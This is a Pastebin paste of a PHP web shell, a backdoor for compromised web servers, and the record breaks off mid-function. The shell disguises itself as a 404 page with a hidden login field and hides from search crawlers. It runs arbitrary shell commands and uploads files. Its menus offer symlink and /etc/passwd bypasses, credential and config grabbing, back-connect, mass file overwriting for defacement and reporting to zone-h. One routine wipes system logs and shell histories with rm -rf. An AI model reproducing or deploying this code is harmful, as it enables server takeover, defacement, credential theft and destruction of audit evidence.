SHARE
TWEET

Untitled

a guest Aug 22nd, 2019 98 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. ######################################################
  3. #Title :rabbitz shell v.1 recoded con7extshell               #
  4. ######################################################
  5. header('HTTP/1.1 404 Not Found');
  6. session_start();
  7. set_time_limit(0);
  8. error_reporting(0);
  9. date_default_timezone_set("Asia/Jakarta");
  10. $auth_pass = "74037cdb40427605060fa4d0312d965a"; // HTML404
  11. if(get_magic_quotes_gpc()) {    
  12. function VEstripslashes($array) {      
  13. return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }  
  14. $_POST = VEstripslashes($_POST);
  15. $_COOKIE = VEstripslashes($_COOKIE); }
  16. @clearstatcache();
  17. @ini_set('error_log',NULL);
  18. @ini_set('log_errors',0);
  19. @ini_set('max_execution_time',0);
  20. @ini_set('output_buffering',0);
  21. @ini_set('display_errors', 0);
  22. $color = "#00ff00";
  23. $default_action = 'FilesMan';
  24. $default_use_ajax = true;
  25. $default_charset = 'UTF-8';
  26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  27.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  28.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  29.         header('HTTP/1.0 404 Not Found');
  30.         exit;
  31.     }
  32. }
  33.  
  34. function Login() {
  35.     die("
  36. <title>404 Not Found</title>
  37.  
  38. <h1>Not Found</h1>
  39.  
  40. <p>The requested URL ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."".$PHP_SELF." was not found on this server.</p>
  41.  
  42. <address>Apache Server at ".$_SERVER['HTTP_HOST']." Port 80</address>
  43.  
  44. <form method='POST'>
  45. <input type='password' name='pass' style='border:none;background:#fff;outline:none;position:fixed;bottom:0;right:0;font-size:20px;'>
  46.  
  47. </form>");
  48.  
  49. }
  50.  
  51. function VEsetcookie($k, $v) {
  52.     $_COOKIE[$k] = $v;
  53.     setcookie($k, $v);
  54. }
  55.  
  56. if(!empty($auth_pass)) {
  57.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  58.         VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  59.  
  60.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  61.         Login();
  62. }
  63. ?>
  64. <html>
  65. <head>
  66. <title></title>
  67. <meta name='author' content=''>
  68. <meta charset="UTF-8">
  69. <link href='' rel='icon' type='image/x-icon'/>
  70. <style type='text/css'>
  71. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  72. html {
  73.     background: #19263a;
  74.     color: #ffffff;
  75.     font-family: 'Share Tech Mono';
  76.     font-size: 12px;
  77.     width: 100%;
  78. }
  79.     body {
  80.     background: #19263a;
  81.     background-size: 100%;
  82.     background-repeat:no-repeat;
  83.     margin: 0px;
  84.     font-family: "Tahoma", sans-serif; cursive;color:#fff;
  85.     font-size: 13px;
  86. }
  87.  
  88. li {
  89.     color: #35f6bc;
  90.     display: inline;
  91.     margin: 1px;
  92.     padding: 1px;
  93. }
  94.  
  95.  
  96. table tr:first-child{  
  97.     background: #19263a;
  98.     text-align: center;
  99.     color: white;
  100. }
  101.  
  102. table, th{
  103.     border-collapse:collapse;
  104.     font-family: Tahoma, Geneva, sans-serif;
  105.     background: transparent;
  106.     font-family: 'tahoma';
  107.     font-size: 12px;
  108. }
  109. td{ border-bottom:1px solid #19263a; padding:0 8px; line-height:24px; }
  110. .table_home, .th_home, .td_home { border-bottom:1px solid #19263a; padding:0 8px; line-height:24px; }
  111. th{ background:#19263a; border-bottom:1px solid #19263a; font-weight:normal; }
  112. a {
  113.     color: #ffffff;
  114.     text-decoration: none;
  115. }
  116. .sinputqw{
  117.     color: #000;
  118.     font-family: sans-serif;
  119.     font-size: 12px;
  120.     height: 1px;
  121. background-color: #38475e;
  122. text-decoration: none;
  123. font-color: #fff;
  124. border: 1px #37465d solid;
  125. }
  126.  
  127. .abir{
  128.     color: #000;
  129.     font-family: sans-serif;
  130.     font-size: 12px;
  131.     height: 29px;
  132. background-color: #35f6bc;
  133. text-decoration: none;
  134. font-color: #fff;
  135. border: 6px #35f6bc solid;
  136. -moz-border-radius: 5px;
  137. -webkit-border-radius:5px;
  138. border-radius:5px;
  139. }
  140. table {
  141.     display: table;
  142.     border-collapse: separate;
  143.     border-spacing: 2px;
  144. }
  145.  
  146. .content{
  147.     width:100%; text-decoration:none; color:#fff;  
  148. }
  149. a{
  150. color:white;
  151. text-decoration: none;
  152. }
  153.  
  154. .content td{
  155.     padding:0 8px; line-height:24px;
  156. }
  157.  
  158. input[type=submit]{
  159.     background:#38475e;
  160.     color:white;
  161.     margin:0 4px;
  162.     font-size:13px;
  163.     border:1px solid #111111;
  164.     cursor:pointer;
  165.     -moz-border-radius: 5px;
  166.     -webkit-border-radius: 5px;
  167.     -khtml-border-radius: 5px;
  168. }
  169. input[type=text] {
  170.     background:#19263a;
  171.     border:0;
  172.     padding:2px;
  173.     border-bottom:1px solid #38475e;
  174.     color:white;
  175. }
  176. select{
  177.     color: #fff;
  178.     font-family: sans-serif;
  179.     font-size: 12px;
  180.     height: 29px;
  181. background-color: #38475e;
  182. text-decoration: none;
  183. font-color: #000;
  184. border: 1px #37465d solid;
  185. -moz-border-radius: 5px;
  186. -webkit-border-radius:5px;
  187. border-radius:5px;
  188.  
  189. }
  190. textarea {
  191.     margin:auto;
  192.     border:1px solid #19263a;
  193.     width:100%;
  194.     height:400px;
  195.     background:#19263a;
  196.     color:#fff;
  197.     padding:0 2px;
  198.     font-size:12px;
  199. }
  200.  
  201.  
  202. </style>
  203. </head>
  204.  
  205. <?php
  206.  
  207. function w($dir,$perm) {
  208.     if(!is_writable($dir)) {
  209.         return "<font color=red>".$perm."</font>";
  210.     } else {
  211.         return "<font color=#1dff00>".$perm."</font>";
  212.     }
  213. }
  214. function exe($cmd) {
  215.     if(function_exists('system')) {        
  216.         @ob_start();       
  217.         @system($cmd);     
  218.         $buff = @ob_get_contents();        
  219.         @ob_end_clean();       
  220.         return $buff;  
  221.     } elseif(function_exists('exec')) {        
  222.         @exec($cmd,$results);      
  223.         $buff = "";        
  224.         foreach($results as $result) {         
  225.             $buff .= $result;      
  226.         } return $buff;    
  227.     } elseif(function_exists('passthru')) {        
  228.         @ob_start();       
  229.         @passthru($cmd);       
  230.         $buff = @ob_get_contents();        
  231.         @ob_end_clean();       
  232.         return $buff;  
  233.     } elseif(function_exists('shell_exec')) {      
  234.         $buff = @shell_exec($cmd);     
  235.         return $buff;  
  236.     }
  237. }
  238. function sulap($text) {
  239.   if(!get_magic_quotes_gpc()) {
  240.     return $text;
  241.     }
  242.   return stripslashes($text);
  243. }
  244. function defid($url,$nick,$team) {
  245. $ch = curl_init("https://defacer.id/archives/notify");
  246. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  247. curl_setopt($ch, CURLOPT_POST, true);
  248. curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
  249. return curl_exec($ch);
  250. curl_close($ch);
  251. }
  252. function zoneh($url,$nick) {
  253. $ch = curl_init("http://www.zone-h.com/notify/single");
  254. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  255. curl_setopt($ch, CURLOPT_POST, true);
  256. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  257. return curl_exec($ch);
  258. curl_close($ch);
  259. }
  260. function GrabUrl($url,$type){
  261.  
  262.         $urlArray = array();
  263.  
  264.         $ch = curl_init();
  265.         curl_setopt($ch, CURLOPT_URL, $url);
  266.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  267.         $result = curl_exec($ch);
  268.  
  269.         $regex='|<a.*?href="(.*?)"|';
  270.         preg_match_all($regex,$result,$parts);
  271.         $links=$parts[1];
  272.         foreach($links as $link){
  273.             array_push($urlArray, $link);
  274.         }
  275.         curl_close($ch);
  276.  
  277.         foreach($urlArray as $value){
  278.             $lol="$url$value";
  279.             if(preg_match("#$type#is", $lol)) {
  280.                 echo "$lol\r\n";
  281.             }
  282.         }
  283. }
  284. function showdisablefunctions() {
  285.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#1dff00><b>".$disablefunc."</b></font></span>"; }
  286.     else { return "<span style='color:#1dff00'><b>NONE</b></span>"; }
  287. }
  288. function ambilKata($param, $kata1, $kata2){
  289.     if(strpos($param, $kata1) === FALSE) return FALSE;
  290.     if(strpos($param, $kata2) === FALSE) return FALSE;
  291.     $start = strpos($param, $kata1) + strlen($kata1);
  292.     $end = strpos($param, $kata2, $start);
  293.     $return = substr($param, $start, $end - $start);
  294.     return $return;
  295. }
  296. function perms($file){
  297. $perms = fileperms($file);
  298. if (($perms & 0xC000) == 0xC000) {
  299. // Socket
  300. $info = 's';
  301. } elseif (($perms & 0xA000) == 0xA000) {
  302. // Symbolic Link
  303. $info = 'l';
  304. } elseif (($perms & 0x8000) == 0x8000) {
  305. // Regular
  306. $info = '-';
  307. } elseif (($perms & 0x6000) == 0x6000) {
  308. // Block special
  309. $info = 'b';
  310. } elseif (($perms & 0x4000) == 0x4000) {
  311. // Directory
  312. $info = 'd';
  313. } elseif (($perms & 0x2000) == 0x2000) {
  314. // Character special
  315. $info = 'c';
  316. } elseif (($perms & 0x1000) == 0x1000) {
  317. // FIFO pipe
  318. $info = 'p';
  319. } else {
  320. // Unknown
  321. $info = 'u';
  322. }
  323.  
  324. // Owner
  325. $info .= (($perms & 0x0100) ? 'r' : '-');
  326. $info .= (($perms & 0x0080) ? 'w' : '-');
  327. $info .= (($perms & 0x0040) ?
  328. (($perms & 0x0800) ? 's' : 'x' ) :
  329. (($perms & 0x0800) ? 'S' : '-'));
  330.  
  331. // Group
  332. $info .= (($perms & 0x0020) ? 'r' : '-');
  333. $info .= (($perms & 0x0010) ? 'w' : '-');
  334. $info .= (($perms & 0x0008) ?
  335. (($perms & 0x0400) ? 's' : 'x' ) :
  336. (($perms & 0x0400) ? 'S' : '-'));
  337.  
  338. // World
  339. $info .= (($perms & 0x0004) ? 'r' : '-');
  340. $info .= (($perms & 0x0002) ? 'w' : '-');
  341. $info .= (($perms & 0x0001) ?
  342. (($perms & 0x0200) ? 't' : 'x' ) :
  343. (($perms & 0x0200) ? 'T' : '-'));
  344.  
  345. return $info;
  346. }
  347. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  348. $sys = php_uname();
  349. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  350. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  351. $getds = @ini_get("disable_functions");
  352. $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  353. $mysql = (function_exists('mysql_connect')) ? "<font color=#1dff00>ON</font>" : "<font color='red'>OFF</font>";
  354. $curl = (function_exists('curl_version')) ? "<font color=#1dff00>ON</font>" : "<font color='red'>OFF</font>";
  355. $wget = (exe('wget --help')) ? "<font color=#1dff00>ON</font>" : "<font color='red'>OFF</font>";
  356. $perl = (exe('perl --help')) ? "<font color=#1dff00>ON</font>" : "<font color='red'>OFF</font>";
  357. $python = (exe('python --help')) ? "<font color=#1dff00>ON</font>" : "<font color='red'>OFF</font>";
  358. if(isset($_GET['path'])){
  359. $path = $_GET['path'];
  360. }else{
  361. $path = getcwd();
  362. }
  363. $path = str_replace('\\','/',$path);
  364. $paths = explode('/',$path);
  365. $home_r = $_SERVER['DOCUMENT_ROOT'];
  366. $_COPY = base64_decode($_c7e);
  367. if(get_magic_quotes_gpc()){
  368. foreach($_POST as $key=>$value){
  369. $_POST[$key] = stripslashes($value);
  370. }
  371. }
  372. if($_POST['upload']) {
  373.         if($_POST['tipe_upload'] == 'biasa') {
  374.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  375.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  376.             } else {
  377.                 $act = "<font color=red>Failed to upload file</font>";
  378.             }
  379.         } else {
  380.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  381.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  382.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  383.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  384.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  385.                 } else {
  386.                     $act = "<font color=red>Failed to upload file</font>";
  387.                 }
  388.             } else {
  389.                 $act = "<font color=red>Failed to upload file</font>";
  390.             }
  391.         }
  392.     }
  393.     echo "<center>
  394.     <form method='post' enctype='multipart/form-data'>
  395.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  396.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  397.     <input type='file' name='ix_file'>
  398.     <input type='submit' value='upload' name='upload'>
  399.     </form></center>";
  400.     echo "<center>".$act."</center>";
  401. echo"
  402. System : <font color=#1dff00>".php_uname()."</font><br>
  403. Server IP : <font color=#1dff00>".gethostbyname($_SERVER["HTTP_HOST"])."</font> | Your IP : <font color=#1dff00>".$_SERVER["REMOTE_ADDR"]."</font><br>
  404. Safe Mode : <font color=#1dff00>".$sm."</font><br>
  405. Disable Functions : <font color=#1dff00>".$ds."</font><br>
  406. MySQL : ".$mysql." | Perl : ".$perl." | Python : ".$python." | WGET : ".$wget." | CURL : ".$curl."<br>"
  407. ;
  408. echo "<form method='post'>
  409.     <font style='text-decoration: underline;'>L4NGK4T@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font>
  410.     <input class='abir' type='text' size='30' height='10' name='cmd'><input class='abir' type='submit' name='do_cmd' value='>>'>
  411.     </form>";
  412.     if($_POST['do_cmd']) {
  413.         echo "<pre><textarea>".exe($_POST['cmd'])."</textarea></pre>";
  414.         }
  415. echo "<BR><center>";
  416. echo "<h1><center><a href=? ><img style='width:200px;'' src='https://www.exploit-db.com/images/edb-banner-logo-white.png'></center></a>
  417.             </h1>";
  418. echo " <b><div id='menu'><center><li><a class='abir' href = '?path=$path&delete=logs'> DELLETE LOGS </a></li><li><a class='abir' href = '?path=$path&kill'> KILL </a></li><li><a class='abir' href = '?path=$path&c=logout'>LOGOUT</a></li></div>";
  419. echo '<center><div id="menu">';
  420. echo '';
  421. echo "<p>";
  422. echo "<BR>";
  423. echo "<li><a class='abir' href='?path=$path&c=title'>mass title change</a></li>";
  424. echo "<li><a class='abir' href='?path=$path&c=changer'>mass user change</a></li>";
  425. echo "<li><a class='abir' href='?path=$path&c=bypsmas'>mass tools v2</a></li>";
  426. echo "<li><a class='abir' href='?path=$path&c=cgipy'>cgi py</a></li>";
  427. echo "<li><a class='abir' href='?path=$path&c=cgi2'>cgi pl v.2</a></li>";
  428. echo "<li><a class='abir' href='?path=$path&c=cgi'>cgi pl</a></li>";
  429. echo "<li><a class='abir' href='?path=$path&config=grabber'>config</a></li>";
  430. echo "<li><a class='abir' href='?path=$path&c=cpanel'>grb cpanel</a></li>";
  431. echo "<li><a class='abir' href='?path=$path&c=jumping'>jumping</a></li>";
  432. echo "<li><a class='abir' href='?path=$path&c=python'>symlink py</a></li>";
  433. echo "<li> <a class='abir' href='?path=$path&c=krdp_shell'>K-RDP Shell</a> </li>";
  434. echo "<BR>";
  435. echo "<BR>";
  436. echo "<li> <a class='abir' href='?path=$path&c=massdepes'>Mass Tools</a> </li>";
  437. echo "<li><a class='abir' href='?path=$path&c=adminer'>adminner</a></li>";
  438. echo "<li><a class='abir' href='?path=$path&c=404'>symlink404</a></li>";
  439. echo "<li><a class='abir' href='?path=$path&c=server'>symlink</a></li>";
  440. echo "<li><a class='abir' href='?path=$path&amp;c=vhosts'>bypass vhost</a></li>";
  441. echo "<li><a class='abir' href='?path=$path&amp;c=passwd'>bypass etc/passwd</a></li>";
  442. echo "<li><a class='abir' href='?path=$path&c=tool'>BackConnect</a></li>";
  443. echo "<li> <a class='abir' href='?path=$path&amp;c=disablefunc'>disable functions</a> </li>";
  444. echo "<li><a class='abir' href='?path=$path&mirror=zoneh'>zone-h</a></li>";
  445. echo "<br>";
  446. echo "<br>";
  447. echo "<li><a class='abir' href='?path=$path&c=smtp'>smtp grabber</a></li>";
  448. echo "<br>";
  449. echo "<BR></b>";
  450. echo "</div></center></center>";
  451. echo '
  452. <br>
  453.  
  454.  
  455. <br>
  456. <table width="700" border="0" align="center">
  457. <th><font color="white">Current Path :</font>';
  458. foreach($paths as $id=>$pat){
  459. if($pat == '' && $id == 0){
  460. $a = true;
  461. echo '<a href="?path=/">/</a>';
  462. continue;
  463. }
  464. if($pat == '') continue;
  465. echo '<a href="?path=';
  466. for($i=0;$i<=$id;$i++){
  467. echo "$paths[$i]";
  468. if($i != $id) echo "/";
  469. }
  470. echo '">'.$pat.'</a>/';
  471. }
  472. echo"</th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th></th><th><a href='?path=$path&c=newfile'>newfile</a> | <a href='?path=$path&c=newfolder'>newfolder</a>";
  473. echo '</th></table><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  474. <tr><td><hr class="sinputqw"></td></tr></table><br><br>';
  475. echo '';
  476. if($_GET['c'] == 'logout') {
  477. echo '<form action="?patch='.$path.'&c=logout" method="post">';
  478.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  479.     echo 'Good Bye!!';
  480. } elseif($_GET['con7ext'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  481. } elseif($_GET['delete'] == 'logs') {
  482.     echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
  483.     echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";      
  484.     exec("rm -rf /tmp/logs");
  485.     exec("rm -rf /root/.ksh_history");
  486.     exec("rm -rf /root/.bash_history");
  487.     exec("rm -rf /root/.bash_logout");
  488.     exec("rm -rf /usr/local/apache/logs");
  489.     exec("rm -rf /usr/local/apache/log");
  490.     exec("rm -rf /var/apache/logs");
  491.     exec("rm -rf /var/apache/log");
  492.     exec("rm -rf /var/run/utmp");
  493.     exec("rm -rf /var/logs");
  494.     exec("rm -rf /var/log");
  495.     exec("rm -rf /var/adm");
  496.     exec("rm -rf /etc/wtmp");
  497.     exec("rm -rf /etc/utmp");
  498.     exec("rm -rf $HISTFILE");
  499.     exec("rm -rf /var/log/lastlog");
  500.     exec("rm -rf /var/log/wtmp");
  501.  
  502.     shell_exec("rm -rf /tmp/logs");
  503.     shell_exec("rm -rf /root/.ksh_history");
  504.     shell_exec("rm -rf /root/.bash_history");
  505.     shell_exec("rm -rf /root/.bash_logout");
  506.     shell_exec("rm -rf /usr/local/apache/logs");
  507.     shell_exec("rm -rf /usr/local/apache/log");
  508.     shell_exec("rm -rf /var/apache/logs");
  509.     shell_exec("rm -rf /var/apache/log");
  510.     shell_exec("rm -rf /var/run/utmp");
  511.     shell_exec("rm -rf /var/logs");
  512.     shell_exec("rm -rf /var/log");
  513.     shell_exec("rm -rf /var/adm");
  514.     shell_exec("rm -rf /etc/wtmp");
  515.     shell_exec("rm -rf /etc/utmp");
  516.     shell_exec("rm -rf $HISTFILE");
  517.     shell_exec("rm -rf /var/log/lastlog");
  518.     shell_exec("rm -rf /var/log/wtmp");
  519.  
  520.     passthru("rm -rf /tmp/logs");
  521.     passthru("rm -rf /root/.ksh_history");
  522.     passthru("rm -rf /root/.bash_history");
  523.     passthru("rm -rf /root/.bash_logout");
  524.     passthru("rm -rf /usr/local/apache/logs");
  525.     passthru("rm -rf /usr/local/apache/log");
  526.     passthru("rm -rf /var/apache/logs");
  527.     passthru("rm -rf /var/apache/log");
  528.     passthru("rm -rf /var/run/utmp");
  529.     passthru("rm -rf /var/logs");
  530.     passthru("rm -rf /var/log");
  531.     passthru("rm -rf /var/adm");
  532.     passthru("rm -rf /etc/wtmp");
  533.     passthru("rm -rf /etc/utmp");
  534.     passthru("rm -rf $HISTFILE");
  535.     passthru("rm -rf /var/log/lastlog");
  536.     passthru("rm -rf /var/log/wtmp");
  537.  
  538.  
  539.     system("rm -rf /tmp/logs");
  540.     sleep(2);
  541.     echo'<br>Deleting .../tmp/logs ';
  542.     sleep(2);
  543.  
  544.     system("rm -rf /root/.bash_history");
  545.     sleep(2);
  546.     echo'<p>Deleting .../root/.bash_history </p>';
  547.  
  548.     system("rm -rf /root/.ksh_history");
  549.     sleep(2);
  550.     echo'<p>Deleting .../root/.ksh_history </p>';
  551.  
  552.     system("rm -rf /root/.bash_logout");
  553.     sleep(2);
  554.     echo'<p>Deleting .../root/.bash_logout </p>';
  555.  
  556.     system("rm -rf /usr/local/apache/logs");
  557.     sleep(2);
  558.     echo'<p>Deleting .../usr/local/apache/logs </p>';
  559.  
  560.     system("rm -rf /usr/local/apache/log");
  561.     sleep(2);
  562.     echo'<p>Deleting .../usr/local/apache/log </p>';
  563.  
  564.     system("rm -rf /var/apache/logs");
  565.     sleep(2);
  566.     echo'<p>Deleting .../var/apache/logs </p>';
  567.  
  568.     system("rm -rf /var/apache/log");
  569.     sleep(2);
  570.     echo'<p>Deleting .../var/apache/log </p>';
  571.  
  572.     system("rm -rf /var/run/utmp");
  573.     sleep(2);
  574.     echo'<p>Deleting .../var/run/utmp </p>';
  575.  
  576.     system("rm -rf /var/logs");
  577.     sleep(2);
  578.     echo'<p>Deleting .../var/logs </p>';
  579.  
  580.     system("rm -rf /var/log");
  581.     sleep(2);
  582.     echo'<p>Deleting .../var/log </p>';
  583.  
  584.     system("rm -rf /var/adm");
  585.     sleep(2);
  586.     echo'<p>Deleting .../var/adm </p>';
  587.  
  588.     system("rm -rf /etc/wtmp");
  589.     sleep(2);
  590.     echo'<p>Deleting .../etc/wtmp </p>';
  591.  
  592.     system("rm -rf /etc/utmp");
  593.     sleep(2);
  594.     echo'<p>Deleting .../etc/utmp </p>';
  595.  
  596.     system("rm -rf $HISTFILE");
  597.     sleep(2);
  598.     echo'<p>Deleting ...$HISTFILE </p>';
  599.  
  600.     system("rm -rf /var/log/lastlog");
  601.     sleep(2);
  602.     echo'<p>Deleting .../var/log/lastlog </p>';
  603.  
  604.     system("rm -rf /var/log/wtmp");
  605.     sleep(2);
  606.     echo'<p>Deleting .../var/log/wtmp </p>';
  607.  
  608.     sleep(4);
  609.  
  610.     echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
  611.     echo"</td></tr></table>";
  612. } elseif($_GET['c'] == 'vhosts'){
  613.     echo "<form method='POST' action=''>";
  614.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  615.     echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  616.         if (isset($_POST['Colii'])){
  617.                         mkdir('symvhosts', 0755);
  618.                         chdir('symvhosts');
  619.                         system('ln -s / Rintoar.txt');
  620.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  621.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  622.             $rt="<br><a href=symvhosts/Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  623.     Bypassed Successfully</b></font></a>";
  624.     echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  625. }
  626. elseif($_GET['c'] == 'massdepes') {
  627.     echo "<center><form action=\"\" method=\"post\">\n";
  628.     $dirr=$_POST['d_dir'];
  629.     $index = $_POST["script"];
  630.     $index = str_replace('"',"'",$index);
  631.     $index = stripslashes($index);
  632.     function edit_file($file,$index){
  633.         if (is_writable($file)) {
  634.         clear_fill($file,$index);
  635.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  636.         }
  637.         else {
  638.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  639.             }
  640.             }
  641.     function hapus_massal($dir,$namafile) {
  642.         if(is_writable($dir)) {
  643.             $dira = scandir($dir);
  644.             foreach($dira as $dirb) {
  645.                 $dirc = "$dir/$dirb";
  646.                 $lokasi = $dirc.'/'.$namafile;
  647.                 if($dirb === '.') {
  648.                     if(file_exists("$dir/$namafile")) {
  649.                         unlink("$dir/$namafile");
  650.                     }
  651.                 } elseif($dirb === '..') {
  652.                     if(file_exists("".dirname($dir)."/$namafile")) {
  653.                         unlink("".dirname($dir)."/$namafile");
  654.                     }
  655.                 } else {
  656.                     if(is_dir($dirc)) {
  657.                         if(is_writable($dirc)) {
  658.                             if(file_exists($lokasi)) {
  659.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  660.                                 unlink($lokasi);
  661.                                 $idx = hapus_massal($dirc,$namafile);
  662.                             }
  663.                         }
  664.                     }
  665.                 }
  666.             }
  667.         }
  668.     }
  669.     function clear_fill($file,$index){
  670.         if(file_exists($file)){
  671.             $handle = fopen($file,'w');
  672.             fwrite($handle,'');
  673.             fwrite($handle,$index);
  674.             fclose($handle);  } }
  675.  
  676.     function gass(){
  677.         global $dirr , $index ;
  678.         chdir($dirr);
  679.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  680.         $files = scandir($dirr) ;
  681.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  682.         sort($files);
  683.         $n = 0 ;
  684.         foreach ($files as $file){
  685.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  686.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  687.                 edit_file($file,$index);
  688.                 flush();
  689.                 $n = $n +1 ;
  690.                 }
  691.                 }
  692.                 echo "<br>";
  693.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  694.                     }
  695.     function ListFiles($dirrall) {
  696.  
  697.     if($dh = opendir($dirrall)) {
  698.  
  699.        $files = Array();
  700.        $inner_files = Array();
  701.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  702.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  703.         while($file = readdir($dh)) {
  704.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  705.                 if(is_dir($dirrall . "/" . $file)) {
  706.                     $inner_files = ListFiles($dirrall . "/" . $file);
  707.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  708.                 } else {
  709.                     array_push($files, $dirrall . "/" . $file);
  710.                 }
  711.             }
  712.             }
  713.  
  714.             closedir($dh);
  715.             return $files;
  716.         }
  717.     }
  718.     function gass_all(){
  719.         global $index ;
  720.         $dirrall=$_POST['d_dir'];
  721.         foreach (ListFiles($dirrall) as $key=>$file){
  722.             $file = str_replace('//',"/",$file);
  723.             echo "<center><strong>$file</strong> ===>";
  724.             edit_file($file,$index);
  725.             flush();
  726.         }
  727.         $key = $key+1;
  728.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  729.     function sabun_massal($dir,$namafile,$isi_script) {
  730.         if(is_writable($dir)) {
  731.             $dira = scandir($dir);
  732.             foreach($dira as $dirb) {
  733.                 $dirc = "$dir/$dirb";
  734.                 $lokasi = $dirc.'/'.$namafile;
  735.                 if($dirb === '.') {
  736.                     file_put_contents($lokasi, $isi_script);
